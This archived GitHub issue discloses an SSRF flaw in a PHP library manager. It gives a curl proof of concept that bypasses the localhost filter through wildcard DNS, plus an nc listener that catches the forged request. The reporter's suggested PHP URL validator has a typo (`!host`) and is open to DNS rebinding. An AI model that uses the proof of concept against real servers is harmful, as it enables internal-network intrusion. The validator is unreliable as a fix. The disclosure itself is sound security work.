Skip to content
This repository has been archived by the owner on Jan 27, 2023. It is now read-only.

SSRF vulnerability #120

Closed
sn00pyd0g3 opened this issue Mar 15, 2018 · 4 comments
Closed

SSRF vulnerability #120

sn00pyd0g3 opened this issue Mar 15, 2018 · 4 comments
Assignees
Labels

Comments

@sn00pyd0g3
Copy link

if ($host === 'localhost'

The filter can be bypassed by wildcard DNS.
e.g. xip.io

POC:

[sn00py.B0x] ➤ curl --request POST 'http://127.0.0.1/librarian/ajaxsupplement.php' --cookie 'PHPSESSID=khjhfcm85jtsfmk54vqij2dd30' --data 'form_new_file_link=http://127.0.0.1.xip.io:1337/ssrf&filename=shell.pdf'
[sn00py.B0x] ➤ nc -l 1337
GET /ssrf HTTP/1.1
Host: 127.0.0.1.xip.io:1337
User-Agent: curl/7.50.3
Accept: */*
@mkucej
Copy link
Owner

mkucej commented Mar 15, 2018

Thanks. Unfortunately, PHP filter does not seem to be very useful for this purpose. Any idea how to fix this?

@mkucej mkucej self-assigned this Mar 15, 2018
@mkucej mkucej added the bug label Mar 15, 2018
@sn00pyd0g3
Copy link
Author

That's my personal advice.

<?php
function is_safe_url($url) {
	// Allow only http(s)
    if(!preg_match('/^https?:\/\/.*$/', $url)){
        return false;
    }

    $host = parse_url($url, PHP_URL_HOST);
    if(!host) {
    	return false;
    }

    $ip = gethostbyname($host);
    $ip = ip2long($ip);
    if($ip === false){
        return false;
    }
    
    $is_inner_ipaddress = ip2long('127.0.0.0') >> 24 == $ip >> 24 or 
        ip2long('10.0.0.0') >> 24 == $ip >> 24 or 
        ip2long('172.16.0.0') >> 20 == $ip >> 20 or 
        ip2long('192.168.0.0') >> 16 == $ip >> 16 ;
    if($is_inner_ipaddress){
        return false;
    }
    return true;
}

@mkucej
Copy link
Owner

mkucej commented Mar 15, 2018

Thank you.

@mkucej
Copy link
Owner

mkucej commented Mar 22, 2018

fixed in 4.9

@mkucej mkucej closed this as completed Mar 22, 2018
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
Projects
None yet
Development

No branches or pull requests

2 participants